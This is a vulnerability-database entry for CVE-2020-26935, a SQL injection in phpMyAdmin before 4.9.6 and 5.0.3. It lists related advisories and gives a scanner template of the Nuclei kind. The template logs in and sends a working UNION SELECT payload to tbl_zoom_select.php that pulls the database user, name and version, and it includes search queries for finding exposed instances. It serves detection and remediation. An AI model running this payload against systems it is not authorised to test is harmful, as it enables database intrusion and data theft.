| Reporter | Title | Published | Views | Family All 64 |
|---|---|---|---|---|
| The vulnerability of the SearchController class implementation in the web application for managing phpMyAdmin database management systems allows a hacker to cause a service failure. | 6 Apr 202100:00 | – | bdu_fstec | |
| CVE-2020-26935 | 10 Oct 202022:35 | – | circl | |
| phpMyAdmin SQL Injection Vulnerability (CNVD-2021-45286) | 12 Oct 202000:00 | – | cnvd | |
| CVE-2020-26935 | 10 Oct 202018:26 | – | cve | |
| CVE-2020-26935 | 10 Oct 202018:26 | – | cvelist | |
| [SECURITY] [DLA 2413-1] phpmyadmin security update | 25 Oct 202011:25 | – | debian | |
| CVE-2020-26935 | 10 Oct 202018:26 | – | debiancve | |
| Debian DLA-2413-1 : phpmyadmin security update | 26 Oct 202000:00 | – | nessus | |
| Fedora 33 : phpMyAdmin (2020-43d8624421) | 26 Oct 202000:00 | – | nessus | |
| Fedora 32 : phpMyAdmin (2020-4e78c86902) | 20 Oct 202000:00 | – | nessus |
id: CVE-2020-26935
info:
name: phpMyAdmin < 5.0.3 - SQL Injection
author: 0x_Akoko
severity: critical
description: |
phpMyAdmin before 4.9.6 and 5.x before 5.0.3 contains a SQL injection caused by improper processing of SQL statements in the search feature, letting attackers inject malicious SQL, exploit requires crafted search input.
impact: |
Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
remediation: |
Update to phpMyAdmin 4.9.6 or 5.0.3, or latest version.
reference:
- https://www.phpmyadmin.net/security/PMASA-2020-6/
- https://github.com/phpmyadmin/phpmyadmin/commit/d09ab9bc9d634ad08b866d42bb8c4109869d38d2
- https://nvd.nist.gov/vuln/detail/CVE-2020-26935
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-26935
epss-score: 0.67081
epss-percentile: 0.99209
cwe-id: CWE-89
metadata:
verified: true
max-request: 4
shodan-query: http.title:"phpMyAdmin"
fofa-query: app="phpMyAdmin"
tags: cve,cve2020,phpmyadmin,sqli,authenticated
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains_all(body, "phpMyAdmin", "name=\"token\"")
condition: and
internal: true
extractors:
- type: regex
name: token
part: body
group: 1
regex:
- 'name="token" value="([^"]+)"'
internal: true
- type: regex
name: set_session
part: body
group: 1
regex:
- 'name="set_session" value="([^"]+)"'
internal: true
- raw:
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
pma_username={{username}}&pma_password={{password}}&server=1&target=index.php&token={{token}}&set_session={{set_session}}
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(header, "pmaAuth-1=")
condition: and
internal: true
- raw:
- |
GET /index.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, "logged_in:true")
condition: and
internal: true
extractors:
- type: regex
name: token2
part: body
group: 1
regex:
- 'token:"([^"]+)"'
internal: true
- raw:
- |
POST /tbl_zoom_select.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
db=testdb&table=users&where_clause=1=0 UNION SELECT 1,CONCAT(USER(),0x3a,DATABASE(),0x3a,VERSION()),3-- -&where_clause_sign=&token={{token2}}&ajax_request=true&get_data_row=true
matchers:
- type: dsl
dsl:
- status_code == 200
- contains_all(body, "\"success\":true", "\"row_info\"")
condition: and
extractors:
- type: regex
name: sqli_data
part: body
group: 1
regex:
- '"username":"([^"]+)"'
# digest: 490a0046304402203ba5d0f96bf65db612e9ccddcb928c44f33af17038ea9a17cef3dee1f5f0267802203163a8ff7d5c8987cffbc164c27dd3b4e4190414bd08a7e3b10bcff9cd1324cd:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation